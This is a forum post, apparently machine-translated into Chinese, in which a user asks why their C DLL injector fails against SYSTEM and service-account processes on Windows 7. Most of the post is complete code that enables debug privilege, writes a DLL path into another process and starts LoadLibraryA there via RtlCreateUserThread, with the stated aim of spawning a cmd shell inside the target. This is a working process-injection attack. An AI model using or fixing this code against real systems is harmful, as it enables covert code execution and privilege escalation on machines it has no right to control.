我写了一个注入dll的程序。 我正在使用RltCreateUserThread。有谁能告诉我我在这里做错了什么。我能够在进程中注入dll,但是注入的dll在注入到与我当前权限相同的进程时会生成cmd shell,但是当我将它们注入到系统/本地服务帐户进程时,它不会抛出shell。我正在使用来自ReactOS的Didier Stevens网站的cmd.dll。我试图从Windows 7 32位。
#include <Windows.h>
#include <stdio.h>
#include <stdbool.h>
typedef struct _CLIENT_ID
{
PVOID UniqueProcess;
PVOID UniqueThread;
} CLIENT_ID, *PCLIENT_ID;
typedef long (*_RtlCreateUserThread)(HANDLE,
PSECURITY_DESCRIPTOR,
BOOLEAN,ULONG,
PULONG,PULONG,
PVOID,PVOID,
PHANDLE,PCLIENT_ID);
_RtlCreateUserThread RtlCreateUserThread;
int main(){
HANDLE hThd, hModule;
CLIENT_ID cid;
DWORD pid;
char * dll="cmd.dll";
HMODULE ntdll=LoadLibrary("ntdll.dll");
HMODULE k32=LoadLibrary("kernel32.dll");
RtlCreateUserThread=GetProcAddress(ntdll,"RtlCreateUserThread");
printf( "Enter pid :");
scanf("%u", &pid);
LUID luid;
HANDLE token_handle;
LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&luid);
TOKEN_PRIVILEGES tp;
tp.Privileges[0].Luid=luid;
tp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
tp.PrivilegeCount=1;
OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&token_handle);
AdjustTokenPrivileges(token_handle,false,&tp,sizeof(tp),NULL,NULL);
HANDLE hProc=OpenProcess(PROCESS_ALL_ACCESS,false,pid);
LPVOID vaex=VirtualAllocEx(hProc,NULL,strlen(dll) + 1,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
WriteProcessMemory(hProc,vaex,dll,strlen(dll),NULL);
RtlCreateUserThread(hProc,NULL,false,0,0,0,(PVOID)GetProcAddress(k32,"LoadLibraryA"),vaex,&hThd,&cid);
WaitForSingleObject(hThd,INFINITE);
CloseHandle(hThd);
CloseHandle(hProc);
FreeLibrary(k32);
FreeLibrary(ntdll);
return 0;
}
感谢, 拉加。